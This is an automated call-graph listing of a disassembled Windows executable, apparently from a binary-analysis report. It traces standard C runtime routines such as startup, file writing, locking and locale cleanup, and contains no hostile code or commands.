API calls 7818->7822 7823 8b10b7 __mtinitlocknum 58 API calls 7819->7823 7830 8b46ff __mtinitlocknum 7820->7830 7821->7819 7824 8b4748 7822->7824 7825 8b47a1 7823->7825 7826 8b475b 7824->7826 7827 8b4766 7824->7827 7828 8b1048 __fptostr 9 API calls 7825->7828 7980 8b47b5 7826->7980 7831 8b10b7 __mtinitlocknum 58 API calls 7827->7831 7828->7830 7830->7789 7832 8b4761 7831->7832 7995 8b478d 7832->7995 7835 8b38c9 __mtinitlocknum 7834->7835 7836 8b38d6 7835->7836 7839 8b38ed 7835->7839 7862 8b1083 7836->7862 7838 8b398c 7842 8b1083 __commit 58 API calls 7838->7842 7839->7838 7841 8b3901 7839->7841 7844 8b3929 7841->7844 7845 8b391f 7841->7845 7846 8b3924 7842->7846 7843 8b10b7 __mtinitlocknum 58 API calls 7854 8b38e2 __mtinitlocknum 7843->7854 7865 8b432b 7844->7865 7847 8b1083 __commit 58 API calls 7845->7847 7850 8b10b7 __mtinitlocknum 58 API calls 7846->7850 7847->7846 7849 8b392f 7851 8b3942 7849->7851 7852 8b3955 7849->7852 7853 8b3998 7850->7853 7874 8b39ac 7851->7874 7855 8b10b7 __mtinitlocknum 58 API calls 7852->7855 7857 8b1048 __fptostr 9 API calls 7853->7857 7854->7796 7858 8b395a 7855->7858 7857->7854 7860 8b1083 __commit 58 API calls 7858->7860 7859 8b394e 7933 8b3984 7859->7933 7860->7859 7863 8aecd8 __getptd_noexit 58 API calls 7862->7863 7864 8b1088 7863->7864 7864->7843 7867 8b4337 __mtinitlocknum 7865->7867 7866 8b4386 EnterCriticalSection 7869 8b43ac __mtinitlocknum 7866->7869 7867->7866 7868 8b0189 __lock 58 API calls 7867->7868 7870 8b435c 7868->7870 7869->7849 7871 8b4374 7870->7871 7872 8afbb7 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7870->7872 7936 8b43b0 7871->7936 7872->7871 7875 8b39b9 __write_nolock 7874->7875 7876 8b39f8 7875->7876 7877 8b3a17 7875->7877 7908 8b39ed 7875->7908 7879 8b1083 __commit 58 API calls 7876->7879 7882 8b3a6f 7877->7882 7883 8b3a53 7877->7883 7878 8b1cfb ___crtMessageBoxW 6 API calls 7880 8b420d 7878->7880 7881 8b39fd 7879->7881 7880->7859 7884 8b10b7 __mtinitlocknum 58 API calls 7881->7884 7885 8b3a88 7882->7885 7940 8b4517 7882->7940 7886 8b1083 __commit 58 API calls 7883->7886 7887 8b3a04 7884->7887 7949 8b3008 7885->7949 7890 8b3a58 7886->7890 7891 8b1048 __fptostr 9 API calls 7887->7891 7893 8b10b7 __mtinitlocknum 58 API calls 7890->7893 7891->7908 7892 8b3a96 7895 8b3def 7892->7895 7899 8aecc0 _LocaleUpdate::_LocaleUpdate 58 API calls 7892->7899 7894 8b3a5f 7893->7894 7896 8b1048 __fptostr 9 API calls 7894->7896 7897 8b3e0d 7895->7897 7898 8b4182 WriteFile 7895->7898 7896->7908 7900 8b3f31 7897->7900 7906 8b3e23 7897->7906 7901 8b3de2 GetLastError 7898->7901 7910 8b3daf 7898->7910 7903 8b3ac2 GetConsoleMode 7899->7903 7911 8b3f3c 7900->7911 7925 8b4026 7900->7925 7901->7910 7902 8b41bb 7902->7908 7909 8b10b7 __mtinitlocknum 58 API calls 7902->7909 7903->7895 7904 8b3b01 7903->7904 7904->7895 7905 8b3b11 GetConsoleCP 7904->7905 7905->7902 7929 8b3b40 7905->7929 7906->7902 7907 8b3e92 WriteFile 7906->7907 7906->7910 7907->7901 7907->7906 7908->7878 7912 8b41e9 7909->7912 7910->7902 7910->7908 7913 8b3f0f 7910->7913 7911->7902 7911->7910 7915 8b3fa1 WriteFile 7911->7915 7916 8b1083 __commit 58 API calls 7912->7916 7917 8b3f1a 7913->7917 7918 8b41b2 7913->7918 7914 8b409b WideCharToMultiByte 7914->7901 7914->7925 7915->7901 7915->7911 7916->7908 7920 8b10b7 __mtinitlocknum 58 API calls 7917->7920 7961 8b1096 7918->7961 7922 8b3f1f 7920->7922 7921 8b40ea WriteFile 7921->7925 7926 8b413d GetLastError 7921->7926 7923 8b1083 __commit 58 API calls 7922->7923 7923->7908 7925->7902 7925->7910 7925->7914 7925->7921 7926->7925 7927 8b467f 60 API calls __write_nolock 7927->7929 7928 8b4697 WriteConsoleW CreateFileW __putwch_nolock 7928->7929 7929->7901 7929->7910 7929->7927 7929->7928 7930 8b3c29 WideCharToMultiByte 7929->7930 7932 8b3cbe WriteFile 7929->7932 7958 8b4506 7929->7958 7930->7910 7931 8b3c64 WriteFile 7930->7931 7931->7901 7931->7929 7932->7901 7932->7929 7979 8b44a6 LeaveCriticalSection 7933->7979 7935 8b398a 7935->7854 7939 8b02f3 LeaveCriticalSection 7936->7939 7938 8b43b7 7938->7866 7939->7938 7966 8b443f 7940->7966 7942 8b4527 7943 8b452f 7942->7943 7944 8b4540 SetFilePointerEx 7942->7944 7945 8b10b7 __mtinitlocknum 58 API calls 7943->7945 7946 8b4558 GetLastError 7944->7946 7947 8b4534 7944->7947 7945->7947 7948 8b1096 __dosmaperr 58 API calls 7946->7948 7947->7885 7948->7947 7950 8b3013 7949->7950 7951 8b3020 7949->7951 7952 8b10b7 __mtinitlocknum 58 API calls 7950->7952 7954 8b302c 7951->7954 7955 8b10b7 __mtinitlocknum 58 API calls 7951->7955 7953 8b3018 7952->7953 7953->7892 7954->7892 7956 8b304d 7955->7956 7957 8b1048 __fptostr 9 API calls 7956->7957 7957->7953 7959 8b44cc __isleadbyte_l 58 API calls 7958->7959 7960 8b4513 7959->7960 7960->7929 7962 8b1083 __commit 58 API calls 7961->7962 7963 8b109f __dosmaperr 7962->7963 7964 8b10b7 __mtinitlocknum 58 API calls 7963->7964 7965 8b10b2 7964->7965 7965->7908 7967 8b444a 7966->7967 7968 8b445f 7966->7968 7969 8b1083 __commit 58 API calls 7967->7969 7970 8b1083 __commit 58 API calls 7968->7970 7972 8b4484 7968->7972 7971 8b444f 7969->7971 7973 8b448e 7970->7973 7974 8b10b7 __mtinitlocknum 58 API calls 7971->7974 7972->7942 7975 8b10b7 __mtinitlocknum 58 API calls 7973->7975 7977 8b4457 7974->7977 7976 8b4496 7975->7976 7978 8b1048 __fptostr 9 API calls 7976->7978 7977->7942 7978->7977 7979->7935 7981 8b443f __close_nolock 58 API calls 7980->7981 7984 8b47c3 7981->7984 7982 8b4819 7998 8b43b9 7982->7998 7984->7982 7985 8b47f7 7984->7985 7986 8b443f __close_nolock 58 API calls 7984->7986 7985->7982 7987 8b443f __close_nolock 58 API calls 7985->7987 7989 8b47ee 7986->7989 7990 8b4803 CloseHandle 7987->7990 7991 8b443f __close_nolock 58 API calls 7989->7991 7990->7982 7992 8b480f GetLastError 7990->7992 7991->7985 7992->7982 7993 8b1096 __dosmaperr 58 API calls 7994 8b4843 7993->7994 7994->7832 8007 8b44a6 LeaveCriticalSection 7995->8007 7997 8b4793 7997->7830 7999 8b4425 7998->7999 8000 8b43c5 7998->8000 8001 8b10b7 __mtinitlocknum 58 API calls 7999->8001 8000->7999 8005 8b43ee 8000->8005 8002 8b442a 8001->8002 8003 8b1083 __commit 58 API calls 8002->8003 8004 8b4416 8003->8004 8004->7993 8004->7994 8005->8004 8006 8b4410 SetStdHandle 8005->8006 8006->8004 8007->7997 7628 8ae9d7 7631 8af9dd 7628->7631 7630 8ae9dc 7630->7630 7632 8afa0d GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7631->7632 7633 8afa00 7631->7633 7634 8afa04 7632->7634 7633->7632 7633->7634 7634->7630 6992 8afb94 GetStartupInfoW 6993 8afbaa 6992->6993 7635 8b4ad4 7636 8b4adc __cfltcvt_init 7635->7636 7637 8b4ae7 7636->7637 7639 8b687a 7636->7639 7645 8b775f 7639->7645 7641 8b688d 7642 8b6894 7641->7642 7643 8b1058 __invoke_watson 8 API calls 7641->7643 7642->7637 7644 8b68a0 7643->7644 7646 8b777b __control87 7645->7646 7650 8b779b __control87 7645->7650 7647 8b10b7 __mtinitlocknum 58 API calls 7646->7647 7648 8b7791 7647->7648 7649 8b1048 __fptostr 9 API calls 7648->7649 7649->7650 7650->7641 8013 8a182b 8017 8b7a2e 8013->8017 8014 8b1cfb ___crtMessageBoxW 6 API calls 8015 8b81f7 8014->8015 8016 8b8209 8017->8014 8017->8016 8089 8a176b 8090 8b345d 8089->8090 8091 8b3508 8090->8091 8092 8b33d4 ___raise_securityfailure 5 API calls 8090->8092 8092->8091 8018 8a592d 8025 8af882 __NMSG_WRITE 8018->8025 8019 8af985 8020 8b1058 __invoke_watson 8 API calls 8019->8020 8021 8af98f 8020->8021 8022 8af8ca 8022->8019 8023 8b19eb __NMSG_WRITE 58 API calls 8022->8023 8024 8af8ea 8023->8024 8024->8019 8027 8b19eb __NMSG_WRITE 58 API calls 8024->8027 8025->8019 8025->8022 8026 8b1a57 __NMSG_WRITE 58 API calls 8025->8026 8026->8022 8028 8af901 8027->8028 8028->8019 8029 8af908 8028->8029 8030 8b1b15 ___crtMessageBoxW 28 API calls 8029->8030 8031 8af918 8030->8031 8032 8b1cfb ___crtMessageBoxW 6 API calls 8031->8032 8033 8af981 8032->8033 7651 8a1ce1 7652 8b1510 7651->7652 7653 8b1569 EncodePointer 7652->7653 7654 8b153c 7652->7654 7653->7654 7657 8b159a 7654->7657 7656 8b1582 __mtinitlocknum 7658 8b159e 7657->7658 7659 8b15a5 7657->7659 7661 8b02f3 LeaveCriticalSection 7658->7661 7659->7656 7661->7659 7662 8ae9e1 7663 8aea16 7662->7663 7664 8ae9f1 7662->7664 7664->7663 7669 8b0144 7664->7669 7670 8b0150 __mtinitlocknum 7669->7670 7671 8aecc0 _LocaleUpdate::_LocaleUpdate 58 API calls 7670->7671 7672 8b0155 7671->7672 7675 8b2354 7672->7675 7686 8b13f0 DecodePointer 7675->7686 7677 8b2359 7678 8b2364 7677->7678 7687 8b1419 7677->7687 7680 8b236e IsProcessorFeaturePresent 7678->7680 7685 8b238c 7678->7685 7681 8b2379 7680->7681 7683 8b0eeb __call_reportfault 7 API calls 7681->7683 7682 8aef95 _raise 58 API calls 7684 8b2396 7682->7684 7683->7685 7685->7682 7686->7677 7690 8b1425 __mtinitlocknum 7687->7690 7688 8b148f 7689 8b146c DecodePointer 7688->7689 7694 8b149e 7688->7694 7695 8b145b _siglookup 7689->7695 7690->7688 7690->7689 7691 8b1456 7690->7691 7697 8b1452 7690->7697 7693 8aecd8 __getptd_noexit 58 API calls 7691->7693 7693->7695 7696 8b10b7 __mtinitlocknum 58 API calls 7694->7696 7698 8b14fc 7695->7698 7700 8aef95 _raise 58 API calls 7695->7700 7702 8b1464 __mtinitlocknum 7695->7702 7699 8b14a3 7696->7699 7697->7691 7697->7694 7703 8b0189 __lock 58 API calls 7698->7703 7706 8b1507 7698->7706 7701 8b1048 __fptostr 9 API calls 7699->7701 7700->7698 7701->7702 7702->7678 7703->7706 7704 8b1569 EncodePointer 7705 8b153c 7704->7705 7707 8b159a _raise LeaveCriticalSection 7705->7707 7706->7704 7706->7705 7707->7702 7708 8a30e5 7709 8ae8c3 7708->7709 7710 8ae8d4 7709->7710 7712 8ae9b0 _fast_error_exit 58 API calls 7709->7712 7711 8aedfa 99 API calls 7710->7711 7713 8ae8da 7711->7713 7712->7710 7714 8ae8e5 __RTC_Initialize 7713->7714 7715 8ae9b0 _fast_error_exit 58 API calls 7713->7715 7716 8af1a3 __ioinit 62 API calls 7714->7716 7715->7714 7717 8ae8f4 7716->7717 7718 8ae900 GetCommandLineW 7717->7718 7719 8ae9b0 _fast_error_exit 58 API calls 7717->7719 7720 8afab9 ___crtGetEnvironmentStringsW 60 API calls 7718->7720 7721 8ae8ff 7719->7721 7722 8ae910 7720->7722 7721->7718 7723 8af457 __wsetargv 59 API calls 7722->7723 7724 8ae91a 7723->7724 7725 8ae925 7724->7725 7726 8aeed7 __lock 58 API calls 7724->7726 7727 8af694 __wsetenvp 58 API calls 7725->7727 7726->7725 7728 8ae92b 7727->7728 7729 8ae936 7728->7729 7730 8aeed7 __lock 58 API calls 7728->7730 7731 8aef11 __cinit 68 API calls 7729->7731 7730->7729 7732 8ae93e 7731->7732 7733 8ae949 __wwincmdln 7732->7733 7734 8aeed7 __lock 58 API calls 7732->7734 7735 8a1000 5 API calls 7733->7735 7734->7733 7736 8ae95d 7735->7736 7737 8ae96c 7736->7737 7738 8af17a 58 API calls 7736->7738 7739 8aef02 58 API calls 7737->7739 7738->7737 7740 8ae971 __mtinitlocknum 7739->7740 8093 8b187b 8094 8b188a 8093->8094 8095 8b18a9 LeaveCriticalSection 8093->8095 8094->8095 8096 8b1891 8094->8096 8099 8b02f3 LeaveCriticalSection 8096->8099 8098 8b18a6 8099->8098 8034 8a683c 8035 8a6842 8034->8035 8036 8b77bc __isctype_l 61 API calls 8035->8036 8037 8b6b32 8036->8037 6994 8b67b3 6997 8b67c4 6994->6997 7006 8b0791 6997->7006 7001 8b67e2 7002 8b67f6 7001->7002 7019 8b6ad3 7001->7019 7004 8b6c41 __forcdecpt_l 65 API calls 7002->7004 7005 8b67c0 7004->7005 7007 8b07a2 7006->7007 7013 8b07ef 7006->7013 7024 8aecc0 7007->7024 7010 8b07cf 7010->7013 7044 8b0ab2 7010->7044 7014 8b6c41 7013->7014 7015 8b6c5f 7014->7015 7016 8b6c4d 7014->7016 7314 8b6afe 7015->7314 7016->7001 7020 8b6adf 7019->7020 7021 8b6af0 7019->7021 7020->7001 7392 8b6a81 7021->7392 7025 8aecd8 __getptd_noexit 58 API calls 7024->7025 7026 8aecc6 7025->7026 7027 8aecd3 7026->7027 7028 8aeed7 __lock 58 API calls 7026->7028 7027->7010 7029 8b06a8 7027->7029 7028->7027 7030 8b06b4 __mtinitlocknum 7029->7030 7031 8aecc0 _LocaleUpdate::_LocaleUpdate 58 API calls 7030->7031 7032 8b06bd 7031->7032 7033 8b06ec 7032->7033 7035 8b06d0 7032->7035 7034 8b0189 __lock 58 API calls 7033->7034 7036 8b06f3 7034->7036 7037 8aecc0 _LocaleUpdate::_LocaleUpdate 58 API calls 7035->7037 7056 8b0728 7036->7056 7038 8b06d5 7037->7038 7041 8b06e3 __mtinitlocknum 7038->7041 7043 8aeed7 __lock 58 API calls 7038->7043 7041->7010 7043->7041 7045 8b0abe __mtinitlocknum 7044->7045 7046 8aecc0 _LocaleUpdate::_LocaleUpdate 58 API calls 7045->7046 7047 8b0ac8 7046->7047 7048 8b0189 __lock 58 API calls 7047->7048 7049 8b0ada 7047->7049 7053 8b0af8 7048->7053 7050 8b0ae8 __mtinitlocknum 7049->7050 7052 8aeed7 __lock 58 API calls 7049->7052 7050->7013 7052->7050 7054 8b0308 _free 58 API calls 7053->7054 7055 8b0b25 7053->7055 7054->7055 7310 8b0b4f 7055->7310 7057 8b0733 ___addlocaleref ___removelocaleref 7056->7057 7059 8b0707 7056->7059 7057->7059 7063 8b04ae 7057->7063 7060 8b071f 7059->7060 7309 8b02f3 LeaveCriticalSection 7060->7309 7062 8b0726 7062->7038 7064 8b0527 7063->7064 7067 8b04c3 7063->7067 7065 8b0308 _free 58 API calls 7064->7065 7066 8b0574 7064->7066 7068 8b0548 7065->7068 7072 8b059d 7066->7072 7133 8b26b1 7066->7133 7067->7064 7070 8b04f4 7067->7070 7078 8b0308 _free 58 API calls 7067->7078 7071 8b0308 _free 58 API calls 7068->7071 7083 8b0308 _free 58 API calls 7070->7083 7092 8b0512 7070->7092 7075 8b055b 7071->7075 7074 8b05fc 7072->7074 7082 8b0308 58 API calls _free 7072->7082 7080 8b0308 _free 58 API calls 7074->7080 7081 8b0308 _free 58 API calls 7075->7081 7076 8b0308 _free 58 API calls 7084 8b051c 7076->7084 7077 8b0308 _free 58 API calls 7077->7072 7079 8b04e9 7078->7079 7093 8b254e 7079->7093 7086 8b0602 7080->7086 7087 8b0569 7081->7087 7082->7072 7088 8b0507 7083->7088 7089 8b0308 _free 58 API calls 7084->7089 7086->7059 7090 8b0308 _free 58 API calls 7087->7090 7121 8b264a 7088->7121 7089->7064 7090->7066 7092->7076 7094 8b255d 7093->7094 7095 8b2646 7093->7095 7096 8b256e 7094->7096 7097 8b0308 _free 58 API calls 7094->7097 7095->7070 7098 8b2580 7096->7098 7099 8b0308 _free 58 API calls 7096->7099 7097->7096 7100 8b2592 7098->7100 7101 8b0308 _free 58 API calls 7098->7101 7099->7098 7102 8b25a4 7100->7102 7104 8b0308 _free 58 API calls 7100->7104 7101->7100 7103 8b25b6 7102->7103 7105 8b0308 _free 58 API calls 7102->7105 7106 8b25c8 7103->7106 7107 8b0308 _free 58 API calls 7103->7107 7104->7102 7105->7103 7108 8b25da 7106->7108 7109 8b0308 _free 58 API calls 7106->7109 7107->7106 7110 8b25ec 7108->7110 7112 8b0308 _free 58 API calls 7108->7112 7109->7108 7111 8b25fe 7110->7111 7113 8b0308 _free 58 API calls 7110->7113 7114 8b2610 7111->7114 7115 8b0308 _free 58 API calls 7111->7115 7112->7110 7113->7111 7116 8b2622 7114->7116 7117 8b0308 _free 58 API calls 7114->7117 7115->7114 7118 8b2634 7116->7118 7119 8b0308 _free 58 API calls 7116->7119 7117->7116 7118->7095 7120 8b0308 _free 58 API calls 7118->7120 7119->7118 7120->7095 7122 8b26ad 7121->7122 7123 8b2655 7121->7123 7122->7092 7124 8b2665 7123->7124 7125 8b0308 _free 58 API calls 7123->7125 7126 8b2677 7124->7126 7128 8b0308 _free 58 API calls 7124->7128 7125->7124 7127 8b2689 7126->7127 7129 8b0308 _free 58 API calls 7126->7129 7130 8b269b 7127->7130 7131 8b0308 _free 58 API calls 7127->7131 7128->7126 7129->7127 7130->7122 7132 8b0308 _free 58 API calls 7130->7132 7131->7130 7132->7122 7134 8b0592 7133->7134 7135 8b26c0 7133->7135 7134->7077 7136 8b0308 _free 58 API calls 7135->7136 7137 8b26c8 7136->7137 7138 8b0308 _free 58 API calls 7137->7138 7139 8b26d0 7138->7139 7140 8b0308 _free 58 API calls 7139->7140 7141 8b26d8 7140->7141 7142 8b0308 _free 58 API calls 7141->7142 7143 8b26e0 7142->7143 7144 8b0308 _free 58 API calls 7143->7144 7145 8b26e8 7144->7145 7146 8b0308 _free 58 API calls 7145->7146 7147 8b26f0 7146->7147 7148 8b0308 _free 58 API calls 7147->7148 7149 8b26f7 7148->7149 7150 8b0308 _free 58 API calls 7149->7150 7151 8b26ff 7150->7151 7152 8b0308 _free 58 API calls 7151->7152 7153 8b2707 7152->7153 7154 8b0308 _free 58 API calls 7153->7154 7155 8b270f 7154->7155 7156 8b0308 _free 58 API calls 7155->7156 7157 8b2717 7156->7157 7158 8b0308 _free 58 API calls 7157->7158 7159 8b271f 7158->7159 7160 8b0308 _free 58 API calls 7159->7160 7161 8b2727 7160->7161 7162 8b0308 _free 58 API calls 7161->7162 7163 8b272f 7162->7163 7164 8b0308 _free 58 API calls 7163->7164 7165 8b2737 7164->7165 7166 8b0308 _free 58 API calls 7165->7166 7167 8b273f 7166->7167 7168 8b0308 _free 58 API calls 7167->7168 7169 8b274a 7168->7169 7170 8b0308 _free 58 API calls 7169->7170 7171 8b2752 7170->7171 7172 8b0308 _free 58 API calls 7171->7172 7173 8b275a 7172->7173 7174 8b0308 _free 58 API calls 7173->7174 7175 8b2762 7174->7175 7176 8b0308 _free 58 API calls 7175->7176 7177 8b276a 7176->7177 7178 8b0308 _free 58 API calls 7177->7178 7179 8b2772 7178->7179 7180 8b0308 _free 58 API calls 7179->7180 7181 8b277a 7180->7181 7182 8b0308 _free 58 API calls 7181->7182 7183 8b2782 7182->7183 7184 8b0308 _free 58 API calls 7183->7184 7185 8b278a 7184->7185 7186 8b0308 _free 58 API calls 7185->7186 7187 8b2792 7186->7187 7188 8b0308 _free 58 API calls 7187->7188 7189 8b279a 7188->7189 7190 8b0308 _free 58 API calls 7189->7190 7191 8b27a2 7190->7191 7192 8b0308 _free 58 API calls 7191->7192 7193 8b27aa 7192->7193 7194 8b0308 _free 58 API calls 7193->7194 7195 8b27b2 7194->7195 7196 8b0308 _free 58 API calls 7195->7196 7197 8b27ba 7196->7197 7198 8b0308 _free 58 API calls 7197->7198 7199 8b27c2 7198->7199 7200 8b0308 _free 58 API calls 7199->7200 7201 8b27d0 7200->7201 7202 8b0308 _free 58 API calls 7201->7202 7203 8b27db 7202->7203 7204 8b0308 _free 58 API calls 7203->7204 7205 8b27e6 7204->7205 7206 8b0308 _free 58 API calls 7205->7206 7207 8b27f1 7206->7207 7208 8b0308 _free 58 API calls 7207->7208 7209 8b27fc 7208->7209 7210 8b0308 _free 58 API calls 7209->7210 7211 8b2807 7210->7211 7212 8b0308 _free 58 API calls 7211->7212 7213 8b2812 7212->7213 7214 8b0308 _free 58 API calls 7213->7214 7215 8b281d 7214->7215 7216 8b0308 _free 58 API calls 7215->7216 7217 8b2828 7216->7217 7218 8b0308 _free 58 API calls 7217->7218 7219 8b2833 7218->7219 7220 8b0308 _free 58 API calls 7219->7220 7221 8b283e 7220->7221 7222 8b0308 _free 58 API calls 7221->7222 7223 8b2849 7222->7223 7224 8b0308 _free 58 API calls 7223->7224 7225 8b2854 7224->7225 7226 8b0308 _free 58 API calls 7225->7226 7227 8b285f 7226->7227 7228 8b0308 _free 58 API calls 7227->7228 7229 8b286a 7228->7229 7230 8b0308 _free 58 API calls 7229->7230 7231 8b2875 7230->7231 7232 8b0308 _free 58 API calls 7231->7232 7233 8b2883 7232->7233 7234 8b0308 _free 58 API calls 7233->7234 7235 8b288e 7234->7235 7236 8b0308 _free 58 API calls 7235->7236 7237 8b2899 7236->7237 7238 8b0308 _free 58 API calls 7237->7238 7239 8b28a4 7238->7239 7240 8b0308 _free 58 API calls 7239->7240 7241 8b28af 7240->7241 7242 8b0308 _free 58 API calls 7241->7242 7243 8b28ba 7242->7243 7244 8b0308 _free 58 API calls 7243->7244 7245 8b28c5 7244->7245 7246 8b0308 _free 58 API calls 7245->7246 7247 8b28d0 7246->7247 7248 8b0308 _free 58 API calls 7247->7248 7249 8b28db 7248->7249 7250 8b0308 _free 58 API calls 7249->7250 7251 8b28e6 7250->7251 7252 8b0308 _free 58 API calls 7251->7252 7253 8b28f1 7252->7253 7254 8b0308 _free 58 API calls 7253->7254 7255 8b28fc 7254->7255 7256 8b0308 _free 58 API calls 7255->7256 7257 8b2907 7256->7257 7258 8b0308 _free 58 API calls 7257->7258 7259 8b2912 7258->7259 7260 8b0308 _free 58 API calls 7259->7260 7261 8b291d 7260->7261 7262 8b0308 _free 58 API calls 7261->7262 7263 8b2928 7262->7263 7264 8b0308 _free 58 API calls 7263->7264 7265 8b2936 7264->7265 7266 8b0308 _free 58 API calls 7265->7266 7267 8b2941 7266->7267 7268 8b0308 _free 58 API calls 7267->7268 7269 8b294c 7268->7269 7270 8b0308 _free 58 API calls 7269->7270 7271 8b2957 7270->7271 7272 8b0308 _free 58 API calls 7271->7272 7273 8b2962 7272->7273 7274 8b0308 _free 58 API calls 7273->7274 7275 8b296d 7274->7275 7276 8b0308 _free 58 API calls 7275->7276 7277 8b2978 7276->7277 7278 8b0308 _free 58 API calls 7277->7278 7279 8b2983 7278->7279 7280 8b0308 _free 58 API calls 7279->7280 7281 8b298e 7280->7281 7282 8b0308 _free 58 API calls 7281->7282 7283 8b2999 7282->7283 7284 8b0308 _free 58 API calls 7283->7284 7285 8b29a4 7284->7285 7286 8b0308 _free 58 API calls 7285->7286 7287 8b29af 7286->7287 7288 8b0308 _free 58 API calls 7287->7288 7289 8b29ba 7288->7289 7290 8b0308 _free 58 API calls 7289->7290 7291 8b29c5 7290->7291 7292 8b0308 _free 58 API calls 7291->7292 7293 8b29d0 7292->7293 7294 8b0308 _free 58 API calls 7293->7294 7295 8b29db 7294->7295 7296 8b0308 _free 58 API calls 7295->7296 7297 8b29e9 7296->7297 7298 8b0308 _free 58 API calls 7297->7298 7299 8b29f4 7298->7299 7300 8b0308 _free 58 API calls 7299->7300 7301 8b29ff 7300->7301 7302 8b0308 _free 58 API calls 7301->7302 7303 8b2a0a 7302->7303 7304 8b0308 _free 58 API calls 7303->7304 7305 8b2a15 7304->7305 7306 8b0308 _free 58 API calls 7305->7306 7307 8b2a20 7306->7307 7308 8b0308 _free 58 API calls 7307->7308 7308->7134 7309->7062 7313 8b02f3 LeaveCriticalSection 7310->7313 7312 8b0b56 7312->7049 7313->7312 7315 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7314->7315 7316 8b6b11 7315->7316 7317 8b6b7d 7316->7317 7318 8b6b1d 7316->7318 7323 8b6b9b 7317->7323 7333 8b44cc 7317->7333 7325 8b6b32 7318->7325 7326 8b77bc 7318->7326 7319 8b10b7 __mtinitlocknum 58 API calls 7321 8b6ba1 7319->7321 7336 8b2c35 7321->7336 7323->7319 7323->7321 7325->7001 7327 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7326->7327 7328 8b77ce 7327->7328 7329 8b77db 7328->7329 7330 8b44cc __isleadbyte_l 58 API calls 7328->7330 7329->7325 7331 8b77ff 7330->7331 7341 8b2d91 7331->7341 7334 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7333->7334 7335 8b44dd 7334->7335 7335->7323 7337 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7336->7337 7338 8b2c46 7337->7338 7363 8b2a31 7338->7363 7342 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7341->7342 7343 8b2da2 7342->7343 7346 8b2c99 7343->7346 7347 8b2cb3 7346->7347 7348 8b2cc0 MultiByteToWideChar 7346->7348 7347->7348 7349 8b2cec 7348->7349 7358 8b2ce5 7348->7358 7352 8b2d0e _memset __crtGetStringTypeA_stat 7349->7352 7354 8b2397 __malloc_crt 58 API calls 7349->7354 7350 8b1cfb ___crtMessageBoxW 6 API calls 7351 8b2d8d 7350->7351 7351->7329 7353 8b2d4a MultiByteToWideChar 7352->7353 7352->7358 7355 8b2d74 7353->7355 7356 8b2d64 GetStringTypeW 7353->7356 7354->7352 7359 8b2c7b 7355->7359 7356->7355 7358->7350 7360 8b2c96 7359->7360 7361 8b2c85 7359->7361 7360->7358 7361->7360 7362 8b0308 _free 58 API calls 7361->7362 7362->7360 7365 8b2a4a MultiByteToWideChar 7363->7365 7367 8b2ab0 7365->7367 7376 8b2aa9 7365->7376 7366 8b1cfb ___crtMessageBoxW 6 API calls 7368 8b2c31 7366->7368 7372 8b2397 __malloc_crt 58 API calls 7367->7372 7377 8b2ad8 __crtGetStringTypeA_stat 7367->7377 7368->7325 7369 8b2b0f MultiByteToWideChar 7370 8b2b76 7369->7370 7371 8b2b28 7369->7371 7374 8b2c7b __freea 58 API calls 7370->7374 7388 8b2f2a 7371->7388 7372->7377 7374->7376 7375 8b2b3c 7375->7370 7378 8b2b52 7375->7378 7380 8b2b7e 7375->7380 7376->7366 7377->7369 7377->7376 7378->7370 7379 8b2f2a __crtLCMapStringA_stat LCMapStringW 7378->7379 7379->7370 7383 8b2397 __malloc_crt 58 API calls 7380->7383 7386 8b2ba6 __crtGetStringTypeA_stat 7380->7386 7381 8b2f2a __crtLCMapStringA_stat LCMapStringW 7382 8b2be9 7381->7382 7384 8b2c11 7382->7384 7387 8b2c03 WideCharToMultiByte 7382->7387 7383->7386 7385 8b2c7b __freea 58 API calls 7384->7385 7385->7370 7386->7370 7386->7381 7387->7384 7389 8b2f55 __crtLCMapStringA_stat 7388->7389 7391 8b2f3a 7388->7391 7390 8b2f6c LCMapStringW 7389->7390 7390->7375 7391->7375 7393 8b0791 _LocaleUpdate::_LocaleUpdate 58 API calls 7392->7393 7394 8b6a92 7393->7394 7395 8b6aa9 7394->7395 7396 8b77bc __isctype_l 61 API calls 7394->7396 7395->7001 7396->7395 6344 8a4173 6345 8ae871 6344->6345 6379 8af18e GetProcessHeap 6345->6379 6347 8ae8c9 6348 8ae8d4 6347->6348 6455 8ae9b0 6347->6455 6380 8aedfa 6348->6380 6351 8ae8da 6352 8ae8e5 __RTC_Initialize 6351->6352 6353 8ae9b0 _fast_error_exit 58 API calls 6351->6353 6401 8af1a3 6352->6401 6353->6352 6355 8ae8f4 6356 8ae900 GetCommandLineW 6355->6356 6357 8ae9b0 _fast_error_exit 58 API calls 6355->6357 6420 8afab9 GetEnvironmentStringsW 6356->6420 6359 8ae8ff 6357->6359 6359->6356 6362 8ae91a 6363 8ae925 6362->6363 6463 8aeed7 6362->6463 6430 8af694 6363->6430 6367 8ae936 6444 8aef11 6367->6444 6368 8aeed7 __lock 58 API calls 6368->6367 6370 8ae93e 6371 8ae949 __wwincmdln 6370->6371 6372 8aeed7 __lock 58 API calls 6370->6372 6450 8a1000 6371->6450 6372->6371 6375 8ae96c 6475 8aef02 6375->6475 6378 8ae971 __mtinitlocknum 6379->6347 6478 8aefa9 RtlEncodePointer 6380->6478 6382 8aedff 6484 8b02ba 6382->6484 6385 8aee08 6488 8aee70 6385->6488 6390 8aee25 6500 8b0340 6390->6500 6393 8aee67 6395 8aee70 __mtterm 61 API calls 6393->6395 6397 8aee6c 6395->6397 6396 8aee46 6396->6393 6398 8aee4c 6396->6398 6397->6351 6509 8aed47 6398->6509 6400 8aee54 GetCurrentThreadId 6400->6351 6402 8af1af __mtinitlocknum 6401->6402 6403 8b0189 __lock 58 API calls 6402->6403 6404 8af1b6 6403->6404 6405 8b0340 __calloc_crt 58 API calls 6404->6405 6407 8af1c7 6405->6407 6406 8af232 GetStartupInfoW 6414 8af247 6406->6414 6415 8af376 6406->6415 6407->6406 6408 8af1d2 __mtinitlocknum @_EH4_CallFilterFunc@8 6407->6408 6408->6355 6409 8af43e 6771 8af44e 6409->6771 6411 8b0340 __calloc_crt 58 API calls 6411->6414 6412 8af3c3 GetStdHandle 6412->6415 6413 8af3d6 GetFileType 